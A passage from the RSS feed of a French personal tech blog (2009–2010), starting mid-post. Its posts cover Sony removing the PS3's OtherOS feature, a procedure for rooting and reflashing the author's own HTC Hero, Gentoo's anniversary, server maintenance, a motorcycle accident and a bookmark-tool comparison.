On sait qu’une mise à jour peut corriger des bugs, combler des failles de sécurité ou encore ajouté de nouvelles fonctionnalités.
Maintenant, nous avons la mise à jour qui supprime des fonctions! Merci SONY!
Quand la playstation 3 est sortie, elle avait 4 ports USB, on pouvait faire tourner des jeux ps2, lire des cartes SD, on installer linux dessus via la fonction OtherOS etc.</description>
      <content>&lt;p&gt;Les mises à jour de firmware sont habituelles pour nombre d’entre nous.&lt;br&gt;
On sait qu’une mise à jour peut corriger des bugs, combler des failles de sécurité ou encore ajouté de nouvelles fonctionnalités.&lt;/p&gt;
&lt;p&gt;Maintenant, nous avons la mise à jour qui supprime des fonctions! Merci SONY!&lt;/p&gt;
&lt;p&gt;Quand la playstation 3 est sortie, elle avait 4 ports USB, on pouvait faire tourner des jeux ps2, lire des cartes SD, on installer linux dessus via la fonction OtherOS etc.&lt;br&gt;
Au fur et à mesure des mises à jour materielles et des baisses de prix, nous avons perdu 2 ports USB, la rétrocompatibilité et le lecteur de carte SD. Rien de choquant jusque la vu que ce sont de nouveaux modèles qui sont vendus.&lt;/p&gt;
&lt;p&gt;La où ça commence à piquer, c’est quand ce jeudi 1er avril, SONY nous fait la bonne blague de sortir un nouveau firmware qui retire la fonction OtherOS à toutes les PS3 qui l’avait.&lt;br&gt;
Plutôt drôle non? Imaginons Apple retirer la fonction SMS de ses téléphones via une mise à jour de firmware…&lt;/p&gt;
&lt;p&gt;Passons sur le fait que les mises à jour de firmware s’accumulent et que le cross game chat n’est toujours pas en vue, le navigateur web n’est toujours pas amélioré, et plus généralement les doléances des utilisateurs déposées sur le site dédié ne sont pas prises en compte.&lt;/p&gt;
&lt;p&gt;Bien que la fonction OtherOS n’ai jamais été mise réellement en avant par SONY, elle a contribué à l’adoption du CELL et de la PS3 dans les milieux des scientifiques et des technofiles pour deux produits en mal de public.&lt;br&gt;
L’objectif est réussi, la PS3 est sur de bons rails depuis quelques mois, ce levier est devenu dispensable.&lt;/p&gt;
&lt;p&gt;Néanmoins, monsieur SONY est magnanime et nous permet de ne pas installer cette mise à jour, grand seigneur! Cependant, ne pas mettre à jour avec le firmware 3.21 signifie ne plus se connecter aux services en ligne de SONY.&lt;/p&gt;
&lt;p&gt;La raison de cette mise à jour est simple et fait réponse aux travaux de Geohot. Le hacker s’est penché il y à quelques temps sur la console de SONY et à eu un accès complet au hardware et à l’hyperviseur.&lt;br&gt;
Solution retenue par SONY, on retire la fonction OtherOS 🙂&lt;/p&gt;
&lt;p&gt;Le principe est tout bonnement dénué de bon sens et est proprement scandaleux. Le retrait de fonctionnalité sur un hardware deja vendu est difficile à accepter.&lt;/p&gt;
&lt;p&gt;Suite à cette décision de SONY, les travaux de GeoHot vont se focaliser sur une méthode qui permettrait de mettre à jour le firmware en conservant la fonction OtherOS selon son dernier billet. D’ici la il nous recommande de ne pas mettre à jour.&lt;/p&gt;
&lt;p&gt;Réaction démesurée de SONY qui ne fait que rendre le challenge plus intéressant. D’ailleurs, on peut lire sur le blog de Geohot:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;I never intended to touch CFW, but if that’s how you want to play…&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;a href=&#34;http://blog.us.playstation.com/2010/03/28/ps3-firmware-v3-21-update/&#34;&gt;Annonce de sony&lt;/a&gt;&lt;br&gt;
&lt;a href=&#34;http://geohotps3.blogspot.com/&#34;&gt;Blog de Geohot&lt;/a&gt;&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>Test de la ROM radio “63.18.55.06JU_6.35.09.26″ sur le HTC HERO [update]</title>
      <link>https://www.lamy.im/posts/test-de-la-rom-radio-63-18-55-06ju_6-35-09-26e280b3-sur-le-htc-hero-update/</link>
      <pubDate>Wed, 31 Mar 2010 09:54:14 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/test-de-la-rom-radio-63-18-55-06ju_6-35-09-26e280b3-sur-le-htc-hero-update/</guid>
      <description>Hier j’ai mis a jour la ROM radio de mon HTC hero.
Je suis passé de la version 63.18.55.06EU_6.35.06.18 qui était celle livrée avec le téléphone à 63.18.55.06JU_6.35.09.26.
Sur un trajet d’1h30 de RER/tramway où j’écoute de la musique et lis les news via les applications de l’android market je consomme habituellement environ 40% de la batterie avec la 3G active et environ 20% sans la 3G.
Avec le nouveau baseband, sur le même trajet avec les même tunnels et la même utilisation, je n’ai consommé que 25% avec la 3G active 🙂</description>
      <content>&lt;p&gt;Hier j’ai mis a jour la ROM radio de mon HTC hero.&lt;br&gt;
Je suis passé de la version 63.18.55.06EU_6.35.06.18 qui était celle livrée avec le téléphone à 63.18.55.06JU_6.35.09.26.&lt;/p&gt;
&lt;p&gt;Sur un trajet d’1h30 de RER/tramway où j’écoute de la musique et lis les news via les applications de l’android market je consomme habituellement environ 40% de la batterie avec la 3G active et environ 20% sans la 3G.&lt;br&gt;
Avec le nouveau baseband, sur le même trajet avec les même tunnels et la même utilisation, je n’ai consommé que 25% avec la 3G active 🙂&lt;/p&gt;
&lt;p&gt;Le wifi me semble légèrement plus rapide à se connecter.&lt;/p&gt;
&lt;p&gt;J’éditerai ce billet quand j’aurai testé le temps de fix du GPS.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;update:&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;A la première installation, le GPS ne fonctionnait pas. J’ai réinstallé la version livrée avec mon téléphone, activé le GPS et remis la nouvelle version.. depuis ça fonctionne. le temps de fix est clairement plus court maintenant.&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>Flash du htc hero FR chez orange</title>
      <link>https://www.lamy.im/posts/flash-du-htc-hero-fr-chez-orange/</link>
      <pubDate>Tue, 30 Mar 2010 17:56:37 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/flash-du-htc-hero-fr-chez-orange/</guid>
      <description>Merci aux amis des sites nolifeclub et geeksleague de ne pas hotlinker sauvagement les ressources hebergées sur ce site. C’est la raison pour laquelle leur lien est redirigé sur cette page. Merci 🙂 Ça fait deux fois que je dois flasher la recovery d’un htc hero, et comme j’oublie à chaque fois, j’en profite pour noter la procédure ici (c’est un peu plus compliqué qu’à l’habitude avec les téléphones orange):</description>
      <content>&lt;h3 id=&#34;merci-aux-amis-des-sites-nolifeclub-et-geeksleague-de-ne-pas-hotlinker-sauvagement-les-ressources-hebergées-sur-ce-site-cest-la-raison-pour-laquelle-leur-lien-est-redirigé-sur-cette-page-merci-&#34;&gt;Merci aux amis des sites nolifeclub et geeksleague de ne pas hotlinker sauvagement les ressources hebergées sur ce site. C’est la raison pour laquelle leur lien est redirigé sur cette page. Merci 🙂&lt;/h3&gt;
&lt;p&gt;Ça fait deux fois que je dois flasher la recovery d’un htc hero, et comme j’oublie à chaque fois, j’en profite pour noter la procédure ici (c’est un peu plus compliqué qu’à l’habitude avec les téléphones orange):&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Installer le SDK d’android&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;a href=&#34;http://developer.android.com/sdk/index.html&#34;&gt;http://developer.android.com/sdk/index.html&lt;/a&gt;&lt;/p&gt;
&lt;!-- raw HTML omitted --&gt;
&lt;!-- raw HTML omitted --&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;$ adb shell
$ cat /sys/class/mmc_host/mmc1/mmc1:*/cid
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Coller le code précédent sur &lt;a href=&#34;http://hexrev.soaa.me/&#34;&gt;http://hexrev.soaa.me/&lt;/a&gt; pour recuperer le code reversed. Remplacer les deux premiers chiffres par 0 sur le code obtenu&lt;br&gt;
– Sur &lt;a href=&#34;http://revskills.de/pages/goldcard.html&#34;&gt;http://revskills.de/pages/goldcard.html&lt;/a&gt; tout renseigner pour recevoir la goldcard.img par email&lt;br&gt;
– Installer un éditeur héxadécimal ( sous windows HxD Hex Editor)&lt;br&gt;
– Monter la carte SD&lt;br&gt;
– Dans le menu de Hex Editor: extra -&amp;gt; Open Disk -&amp;gt; « Physical Disk » -&amp;gt; « Removable Disk », décocher “Open as ReadOnly” (Size 512 (Hard Disks/Floppy Disks))&lt;br&gt;
– Dans le menu de Hex Editor: extra -&amp;gt; Open Disk Image -&amp;gt; goldcard.img&lt;br&gt;
– Dans l’onglet de Goldcard.img (ctrl+A et ctrl+C)&lt;br&gt;
– Dans l’onglet du Removable Disk, selectionner les lignes jusque 00000170 et ctrl+V&lt;br&gt;
– SAVE et reboot du hero&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Downgrade de la ROM&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;– Recuperer la derniere version de HTC sync&lt;br&gt;
– Brancher le telephone et activer la synchro pc&lt;br&gt;
– &lt;a href=&#34;https://www.lamy.im/uploads/RUU_Hero_HTC_WWE_2.73.405.5_WWE_release_signed_NoDriver.tar&#34;&gt;Télécharger un firmware générique&lt;/a&gt;&lt;br&gt;
– le downgrade est en cours.&lt;br&gt;
Des ROM plus anciennes existent mais elles ne sont pas passées sur mon telephone.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;IV. Flash de la ROM de recovery&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;– &lt;a href=&#34;https://www.lamy.im/uploads/flashrec-1.1.2-20090909.apk&#34;&gt;Télécharger flashrec&lt;/a&gt;&lt;br&gt;
– Télécharger une ROM de recovery patchée (&lt;a href=&#34;https://www.lamy.im/uploads/recovery-RA-hero-v1.6.2-green.img&#34;&gt;j’ai pris celle la&lt;/a&gt;)&lt;br&gt;
– Backup+flash de la ROM avec flashrec (/sdcard/nomdelaROM.img)&lt;/p&gt;
&lt;p&gt;Des versions plus récente de flashrec existent mais n’ont pas fonctionnées sur mon téléphone.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;V. remplacement de la ROM/baseband&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;– maniere habituelle (update.zip à la racine de la microSD) via la ROM de recovery en appuyant sur les boutons « home » et « power »&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Liens&lt;/strong&gt;:&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;a href=&#34;http://forum.xda-developers.com/forumdisplay.php?f=512&#34;&gt;Forum de xda-developers&lt;/a&gt;&lt;br&gt;
&lt;a href=&#34;http://android.modaco.com/content/htc-hero-hero-modaco-com/291942/22-jan-stock-roms-radios-in-update-zip-format-for-gsm-hero/&#34;&gt;Les ROM radio dispo chez modaco&lt;/a&gt;&lt;br&gt;
&lt;a href=&#34;http://android.modaco.com/category/409/htc-hero-hero-modaco-com/&#34;&gt;La ROM de modaco pour le hero&lt;/a&gt;&lt;br&gt;
&lt;a href=&#34;http://code.google.com/p/flashrec/&#34;&gt;Flashrec&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Voila 🙂&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>Mise à jour du dom0</title>
      <link>https://www.lamy.im/posts/mise-a-jour-du-dom0/</link>
      <pubDate>Tue, 02 Mar 2010 22:04:25 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/mise-a-jour-du-dom0/</guid>
      <description>Et hop, une petite mise a jour du dom0. Ca à entrainé une coupure de toutes les machines pendant plusieurs heures (surtout le temps de la sauvegarde/restauration des VM).
Tout est vite reparti, ca fait partie des joies de la virtualisation 🙂</description>
      <content>&lt;p&gt;Et hop, une petite mise a jour du dom0. Ca à entrainé une coupure de toutes les machines pendant plusieurs heures (surtout le temps de la sauvegarde/restauration des VM).&lt;/p&gt;
&lt;p&gt;Tout est vite reparti, ca fait partie des joies de la virtualisation 🙂&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>Du boulot! plein! mais quelques bricoles quand même :p</title>
      <link>https://www.lamy.im/posts/du-boulot-plein-mais-quelques-bricoles-quand-meme-p/</link>
      <pubDate>Mon, 15 Feb 2010 23:37:20 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/du-boulot-plein-mais-quelques-bricoles-quand-meme-p/</guid>
      <description>Fini les vacances et nouveau job en vue. Je suis pas mal occupé en ce moment. Le projet sur lequel je bosse va occuper mes journées pendant de longs mois.
Néanmoins je ne suis pas loin (mon status jabber est à droite :p), quand j’aurai un moment je publierai la méthode que j’ai utilisée pour rooter mon htc hero avec le ROM orange.
Côté jeux, celui qui va valoir le coup ce mois ci c’est Heavy Rain, une création à la croisée des chemins entre jeu vidéo et film interactif.</description>
      <content>&lt;p&gt;Fini les vacances et nouveau job en vue. Je suis pas mal occupé en ce moment. Le projet sur lequel je bosse va occuper mes journées pendant de longs mois.&lt;/p&gt;
&lt;p&gt;Néanmoins je ne suis pas loin (mon status jabber est à droite :p), quand j’aurai un moment je publierai la méthode que j’ai utilisée pour rooter mon htc hero avec le ROM orange.&lt;/p&gt;
&lt;p&gt;Côté jeux, celui qui va valoir le coup ce mois ci c’est Heavy Rain, une création à la croisée des chemins entre jeu vidéo et film interactif. Loin du FPS, loin d’être une succession de scène entrecoupées de choix, on est toujours manette en main en train de jouer son personnage, l’histoire est interessante. Un jeu à tester tant il promet d’être une belle expérience narrative.&lt;/p&gt;
&lt;p&gt;Merci les gars de &lt;a href=&#34;http://www.quanticdream.com/&#34;&gt;quantic dream&lt;/a&gt;&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>Mise à jour du serveur jabber</title>
      <link>https://www.lamy.im/posts/mise-a-jour-du-serveur-jabber/</link>
      <pubDate>Thu, 17 Dec 2009 12:41:55 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/mise-a-jour-du-serveur-jabber/</guid>
      <description>Petit downtime d’une minute hier avec 2 coupures du serveur jabber pour la mise à jour vers la dernière version stable.
La passerelle MSN et webprésence sont toujours dispo 🙂</description>
      <content>&lt;p&gt;Petit downtime d’une minute hier avec 2 coupures du serveur jabber pour la mise à jour vers la dernière version stable.&lt;/p&gt;
&lt;p&gt;La passerelle MSN et &lt;a href=&#34;http://www.lamy.im/afficher-son-s%E2%80%A6ber-sur-le-web/&#34;&gt;webprésence&lt;/a&gt; sont toujours dispo 🙂&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>Ma vie avec mon HTC hero sous Android</title>
      <link>https://www.lamy.im/posts/ma-vie-avec-mon-htc-hero-sous-android/</link>
      <pubDate>Mon, 12 Oct 2009 16:04:04 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/ma-vie-avec-mon-htc-hero-sous-android/</guid>
      <description>J’ai enfin abandonné le monde des téléphones mobile classique pour un smartphone ultra communiquant. L’heureux élu est le Hero de HTC.
Je ne connais pas l’interface classique d’Android, mais le duo Android + Sense (la surcouche d’HTC) est vraiment agréable à utiliser. J’étais un peu dérouté au début par l’utilisation du bouton menu pour accéder aux paramètres des applications et le bouton de retour, mais au bout d’un ou deux jour, on s’y fait.</description>
      <content>&lt;p&gt;J’ai enfin abandonné le monde des téléphones mobile classique pour un smartphone ultra communiquant. L’heureux élu est le Hero de HTC.&lt;/p&gt;
&lt;p&gt;Je ne connais pas l’interface classique d’Android, mais le duo Android + Sense (la surcouche d’HTC) est vraiment agréable à utiliser. J’étais un peu dérouté au début par l’utilisation du bouton menu pour accéder aux paramètres des applications et le bouton de retour, mais au bout d’un ou deux jour, on s’y fait.&lt;/p&gt;
&lt;p&gt;Il n’y a pas de possibilité de synchronisation avec un mac à l’heure actuelle, à priori &lt;a href=&#34;http://www.markspace.com/&#34;&gt;ce sera bientôt possible&lt;/a&gt;. On peut synchroniser le Hero sous Windows via le logiciel fourni HTC sync ou sur internet via le service gmail et google contact.&lt;/p&gt;
&lt;p&gt;Il y à encore quelques problèmes a ce niveau, l’import de mes contacts sur simcard vers Google n’a pas fonctionné et les groupes standard (Famille, Amis etc) de Google contact ne sont pas descendus sur le mobile.&lt;/p&gt;
&lt;p&gt;Malgré sont jeune age, l’Android market (équivalent de l’Appstore d’Apple) est plutôt bien fourni en applications, un peu moins en jeux.&lt;/p&gt;
&lt;p&gt;Voici quelques applications très utiles que j’utilise depuis quelques jours :&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Astro&lt;/strong&gt; : Navigateur de fichiers très complet et ergonomique&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Car mode&lt;/strong&gt; : Permet de forcer le mode haut parleur en lançant l’appli, pratique quand on est en voiture.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;DaraIRC&lt;/strong&gt; : Client IRC pratique, permet d’enregistrer serveur et channel.&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;http://code.google.com/p/g2android/&#34;&gt;&lt;strong&gt;G2Android&lt;/strong&gt;&lt;/a&gt; : Tout simplement une application géniale qui permet d’uploader rapidement ses photos sur sa &lt;a href=&#34;http://gallery.menalto.com/&#34;&gt;gallery&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;ixMAT Scanner&lt;/strong&gt; : Scanner de code bar, permet de lancer des recherches sur le net ou de telecharger une application simplement depuis le market.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Jabiru&lt;/strong&gt; : Client Jabber, la ressource, priorité, status sont réglables.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;KeepWiFi&lt;/strong&gt; : Permet d’empecher la désactivation du WiFi lors de la veille.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Layar&lt;/strong&gt; : Cette appli permet de mapper une carte sur l’image captée par la caméra, ca permet de trouver rapidement le métro le plus proche grâce a la réalité augmentée.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Locale&lt;/strong&gt; : On défini un point de localisation, un périmetre et des actions associées (activer le wifi en arrivant a la maison, passer en vibreur au bureau, changer le fond d’ecran etc)&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Metal Detector&lt;/strong&gt; : Sans conteste l’application la plus utile. Un détecteur de métal !&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Parallel Kingdom&lt;/strong&gt; : C’est un jeu ou le terrain est sa propre ville. La position de son joueur dépend de celle de son téléphone mobile sur google maps.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Ringdroid&lt;/strong&gt; : Cette application rend la création de sonneries et alertes très simple à partir de ses mp3 stockés sur la carte SD.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Coté autonomie, en jouant avec le GPS et le WIFI, ca tient une journée, en utilisation normale, 2 ou 3 jours. C’est dans le moyenne des smartphones actuels.&lt;/p&gt;
&lt;p&gt;En presque une semaine d’utilisation, je suis pleinement satisfait de ce téléphone, par contre, un téléphone de ce type n’a d’intérêt qu’avec internet illimité… option qui coute tout de même 12€/mois chez orange 🙁&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>Quelle application pour gerer ses bookmarks ?</title>
      <link>https://www.lamy.im/posts/quelle-application-pour-gerer-ses-bookmarks/</link>
      <pubDate>Wed, 07 Oct 2009 01:04:36 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/quelle-application-pour-gerer-ses-bookmarks/</guid>
      <description>Ces jours ci je tatonne pour trouver un moyen efficace de gerer mes signets. A l’heure actuelle j’utilise plusieurs ordinateurs, je me débrouillais de facon un peu empirique et pas vraiment efficace pour retrouver mes signets partout. Je vais m’équiper de mon premier smartphone demain et je sens deja que ce sera le browser de trop si je ne trouve pas de solution à cette histoire de signets :p.
Voici les contraintes.</description>
      <content>&lt;p&gt;Ces jours ci je tatonne pour trouver un moyen efficace de gerer mes signets. A l’heure actuelle j’utilise plusieurs ordinateurs, je me débrouillais de facon un peu empirique et pas vraiment efficace pour retrouver mes signets partout. Je vais m’équiper de mon premier smartphone demain et je sens deja que ce sera le browser de trop si je ne trouve pas de solution à cette histoire de signets :p.&lt;/p&gt;
&lt;p&gt;Voici les contraintes. L’outil doit être assez souple et permettre d’acceder à mes marques pages depuis plusieurs machines et/ou plusieurs navigateurs.&lt;/p&gt;
&lt;p&gt;J’ai d’abord testé le système de bookmark de google.. bilan:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Liste complete accessible via toolbar&lt;/li&gt;
&lt;li&gt;Possibilité de passer par &lt;a href=&#34;http://www.google.com/bookmarks/&#34;&gt;http://www.google.com/bookmarks/&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Gestion des tags&lt;/li&gt;
&lt;li&gt;Import/export&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Je ne suis pas fan de laisser mes données être hebergées on ne sait ou. Je me suis alors mis en quête d’un outil de gestion de signet administrable de mon coté. Je suis vite tombé sur &lt;a href=&#34;http://sourceforge.net/projects/scuttle/&#34; title=&#34;Scuttle&#34;&gt;Scuttle&lt;/a&gt;. Scuttle est un outil simple utilisant php/sql pour gerer les signets.&lt;/p&gt;
&lt;p&gt;Je passe sur l’installation qui est assez simple, voici mes impressions:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Pas de toolbar mais un javascript dispo à mettre dans son browser pour marquer rapidement une page&lt;/li&gt;
&lt;li&gt;Possibilité de passer par le web&lt;/li&gt;
&lt;li&gt;Gestion des tags&lt;/li&gt;
&lt;li&gt;Import/export plus fourni que celui de google, on peut importer depuis del.icio.us. Néanmoins mon importation n’a pas pu récuperer mes tags.&lt;/li&gt;
&lt;li&gt;Possibilité de rendre les liens public/privés (je n’ai pas vu cette option chez google)&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;http://moneybaron.org/2008/05/21/scuttle-firefox-3-extension/&#34; title=&#34;scuttle extension for firefox&#34;&gt;Une extension pour firefox est téléchargeable pour marquer rapidement les liens&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Pour conclure, je vais rester sur Scuttle, plus simple à gerer, on en maitrise l’hébergement. Certes, ça oblige à acceder à une page web pour voir ses bookmarks mais on y gagne en souplesse quand on oscille regulierement entre différents ordinateurs. L’interface est sobre et agréable à l’oeil, récurée à l’AJAX. Scuttle c’est bon mangez en 🙂&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>Gentoo à 10 ans!</title>
      <link>https://www.lamy.im/posts/gentoo-a-10-ans/</link>
      <pubDate>Mon, 05 Oct 2009 19:30:38 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/gentoo-a-10-ans/</guid>
      <description>Hier, Gentoo fêtait ses 10ans!
Les profils 10.0 sont sortis en desktop, server etc.
Pour moi ça fait 6 ans d’utilisation de Gentoo… 6ans de compilation, d’expérimentations, de serveur X qui ne démarre plus, de chroot pour remettre la machine en état, une migration de pam vers shadow qui donne des suées, 6 ans de partage sur irc, d’énervement parfois, de contentement d’avoir trouvé une solution souvent 🙂
J’en profite pour adresser 6 ans de merci à la communauté Gentoo!</description>
      <content>&lt;p&gt;Hier, Gentoo fêtait ses 10ans!&lt;/p&gt;
&lt;p&gt;Les profils 10.0 sont sortis en &lt;em&gt;desktop&lt;/em&gt;, &lt;em&gt;server&lt;/em&gt; etc.&lt;/p&gt;
&lt;p&gt;Pour moi ça fait 6 ans d’utilisation de Gentoo… 6ans de compilation, d’expérimentations, de serveur X qui ne démarre plus, de chroot pour remettre la machine en état, une migration de pam vers shadow qui donne des suées, 6 ans de partage sur irc, d’énervement parfois, de contentement d’avoir trouvé une solution souvent 🙂&lt;/p&gt;
&lt;p&gt;J’en profite pour adresser 6 ans de merci à la communauté Gentoo!&lt;/p&gt;
&lt;p&gt;thank you guys !&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>Dis maman les p&#39;tits motards ont ils des jambes ?</title>
      <link>https://www.lamy.im/posts/dis-maman-les-ptits-motards-ont-ils-des-jambes/</link>
      <pubDate>Thu, 30 Jul 2009 12:25:06 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/dis-maman-les-ptits-motards-ont-ils-des-jambes/</guid>
      <description>Surtout, surtout, ne jamais doubler une femme qui souhaite changer de file.
Jeudi 23, le matin, temps clair, la moto rutilante, plein phare pour remonter la file de voiture presque à l’arrêt, à l’heure pour être au travail, une femme avec une envie de faire demi tour sur la route bloquée par le trafic, manque d’attention, route trop étroite, la voiture, freinage vain et paf superman, attérissage sur le casque (ouf), moto en épave.</description>
      <content>&lt;p&gt;Surtout, surtout, ne jamais doubler une femme qui souhaite changer de file.&lt;/p&gt;
&lt;p&gt;Jeudi 23, le matin, temps clair, la moto rutilante, plein phare pour remonter la file de voiture presque à l’arrêt, à l’heure pour être au travail, une femme avec une envie de faire demi tour sur la route bloquée par le trafic, manque d’attention, route trop étroite, la voiture, freinage vain et paf superman, attérissage sur le casque (ouf), moto en épave.&lt;/p&gt;
&lt;p&gt;C’est beau un capot vue du ciel… Heureusement que ma visière était propre, j’ai pu ne rien manquer du vol et de mon atterrissage face à terre.&lt;/p&gt;
&lt;p&gt;Pas d’os brisé, mais de la tôle et du plastique… je m&amp;rsquo;en serai passé. Une moto de collection en moins, ca fera un peu de moins de pollution, qu’importe la taxe carbone pourvu qu’on ait l’ivresse…&lt;br&gt;
… j’ai désaoulé.&lt;/p&gt;
&lt;p&gt;2 jours seulement d’arrêt de travail grâce au médecin de l’hôpital, c’est pas moi qui vais agrandir le trou de la sécu 🙂&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>E17 s&#39;approche encore de la release</title>
      <link>https://www.lamy.im/posts/e17-sapproche-encore-de-la-release/</link>
      <pubDate>Mon, 13 Jul 2009 15:53:07 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/e17-sapproche-encore-de-la-release/</guid>
      <description>Non ce n’est pas un vaporware! ;)
D’ailleurs les dev sont actuellement en train de se concentrer sur la stabilisation des EFL dont certaines sont déjà sortie en version stable. La TODO list est accessible ici.
Enlightenment DR17 est utilisable sur desktop et embarqué. Des snapshot sont fait régulièrement sont téléchargeables ici.
Ci dessous les EFL déjà sorties en version finale:
EET v1.2.1: bibliothèque légère et rapide permettant de creer des archives</description>
      <content>&lt;p&gt;Non ce n’est pas un vaporware! ;)&lt;/p&gt;
&lt;p&gt;D’ailleurs les dev sont actuellement en train de se concentrer sur la stabilisation des EFL dont certaines sont déjà sortie en version stable. La TODO list est &lt;a href=&#34;http://trac.enlightenment.org/e/wiki/Release&#34;&gt;accessible ici&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Enlightenment DR17 est utilisable sur desktop et embarqué. Des snapshot sont fait régulièrement sont &lt;a href=&#34;http://download.enlightenment.org/snapshots/LATEST/&#34;&gt;téléchargeables ici&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Ci dessous les EFL déjà sorties en version finale:&lt;br&gt;
EET v1.2.1: bibliothèque légère et rapide permettant de creer des archives&lt;br&gt;
EWL v0.5.3: bibliothèque de widget themable&lt;/p&gt;
&lt;p&gt;Eina (bibliothèque de data type) devrait sortir en version 1.0.0 durant le mois de juillet, une fois que la documentation sera à jour.&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>Rumeur de faille dans openssh</title>
      <link>https://www.lamy.im/posts/faille-dans-openssh/</link>
      <pubDate>Thu, 09 Jul 2009 16:15:38 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/faille-dans-openssh/</guid>
      <description>Une rumeur court à propos d’une faille inconnue dans le serveur OpenSSH.
Il est pour le moment conseillé de mettre à jour sa version d’openssh et de surveiller les updates.
La faille n’est pour le moment pas révélée, donc aucun fix n’existe à l’heure actuelle. Des machines ont été compromises… même si on ne sait pas si c’est lié a cette rumeur mieux vaut être vigilant… stay tuned 🙂
http://isc.sans.org/diary.html?storyid=6742</description>
      <content>&lt;p&gt;Une rumeur court à propos d’une faille inconnue dans le serveur OpenSSH.&lt;/p&gt;
&lt;p&gt;Il est pour le moment conseillé de mettre à jour sa version d’openssh et de surveiller les updates.&lt;/p&gt;
&lt;p&gt;La faille n’est pour le moment pas révélée, donc aucun fix n’existe à l’heure actuelle. Des machines ont été compromises… même si on ne sait pas si c’est lié a cette rumeur mieux vaut être vigilant… stay tuned 🙂&lt;/p&gt;
&lt;p&gt;&lt;a href=&#34;http://isc.sans.org/diary.html?storyid=6742&#34;&gt;http://isc.sans.org/diary.html?storyid=6742&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;edith: Visiblement il s’agit d’un hoax. Quoi qu’il arrive il faut être attentif à la sécurité de son serveur ssh.&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>Je vais bientôt écrire trois lettres</title>
      <link>https://www.lamy.im/posts/je-vais-bientot-ecrire-trois-lettres/</link>
      <pubDate>Wed, 17 Jun 2009 13:09:38 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/je-vais-bientot-ecrire-trois-lettres/</guid>
      <description>D’ici quelques temps, ce sera à mon tour de glisser mes trois lettres dans le tiroir et ceder ma place 🙂
Pour les non anglophones, voici une traduction libre à l’arrache :
Quand j’ai été recruté dans le département informatique d’une grande société, j’ai trouvé 3 lettres laissées par mon prédécesseur dans ce bureau qui était maintenant le mien. Chaque lettre était clairement identifiée, Incident #1, Incident #2, Incident #3. Un post-it était collé au dessus des lettres:</description>
      <content>&lt;p&gt;D’ici quelques temps, ce sera à mon tour de glisser &lt;a href=&#34;http://www.hmtk.com/archives/33-The-Three-Letters.html&#34; title=&#34;trois lettres&#34;&gt;mes trois lettres&lt;/a&gt; dans le tiroir et ceder ma place 🙂&lt;/p&gt;
&lt;p&gt;Pour les non anglophones, voici une traduction libre à l’arrache :&lt;/p&gt;
